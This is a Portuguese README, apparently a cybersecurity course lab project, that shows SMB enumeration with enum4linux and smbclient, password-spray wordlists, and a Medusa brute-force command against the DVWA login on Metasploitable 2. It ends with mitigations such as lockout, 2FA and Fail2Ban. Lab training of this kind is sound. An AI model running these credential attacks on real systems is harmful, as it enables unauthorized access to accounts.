Simulação de Ataque Brute Force e Enumeração | Medusa & Kali Linux Este projeto demonstra a execução de técnicas de Brute Force (Força Bruta) e Enumeração de Serviços em um ambiente controlado (Lab), utilizando ferramentas nativas do Kali Linux para identificar vulnerabilidades de autenticação.
⚙️ Tecnologias e Ferramentas SO: Kali Linux
Alvo: Metasploitable 2 (IP: 192.168.56.101)
Aplicação Web: DVWA (Damn Vulnerable Web Application)
Ferramentas: * Medusa: Brute force modular e paralelo.
Enum4linux: Enumeração de informações em sistemas Windows e Samba.
Smbclient: Cliente para acessar recursos compartilhados SMB/CIFS.
🚀 Etapas do Projeto
- Enumeração de Serviços (SMB) Antes do ataque de força bruta, foi realizada uma enumeração no serviço Samba para identificar usuários e compartilhamentos disponíveis.
Bash
enum4linux -a 192.168.56.101 | tee enum4_output.txt
smbclient -L //192.168.56.101 -U msfadmin 2. Preparação de Wordlists Para o ataque de Password Spraying, foram criadas listas personalizadas baseadas nos dados coletados:
Bash
echo -e "user\nmsfadmin\nservice" > smb_users.txt
echo -e "password\n123456\nWelcome123\nmsfadmin" > senhas_spray.txt 3. Ataque de Brute Force Web (HTTP-FORM) Utilização do Medusa para testar combinações de credenciais na página de login do DVWA. O comando foi configurado para identificar a falha através da string de erro retornada pela página.
Bash
medusa -h 192.168.56.101 -U users.txt -P pass.txt -M http
-m PAGE:'/dvwa/login.php'
-m FORM:'username=^USER^&password=^PASS^&Login=Login'
-m 'FAIL=Login failed' -t 6
Parâmetros utilizados:
-h: IP do alvo.
-U / -P: Caminhos para as wordlists de usuários e senhas.
-M http: Módulo de protocolo utilizado.
-m FORM: Define os campos de input do formulário e a mensagem de erro (FAIL).
-t 6: Define o número de threads (testes simultâneos).
🛡️ Medidas de Mitigação Como resultado deste estudo, as seguintes boas práticas são recomendadas para evitar este tipo de ataque:
Políticas de Bloqueio: Implementar bloqueio temporário de conta após X tentativas falhas.
2FA (Segundo Fator de Autenticação): Essencial para impedir acessos mesmo com a senha correta.
Monitoramento de Logs: Utilizar ferramentas como Fail2Ban para detectar e banir IPs que realizam múltiplas requisições de login.
Complexidade de Senha: Exigir senhas que não constem em wordlists comuns.
Desenvolvido por: Hélio Júnior / Curso Cibersegurança(Dio)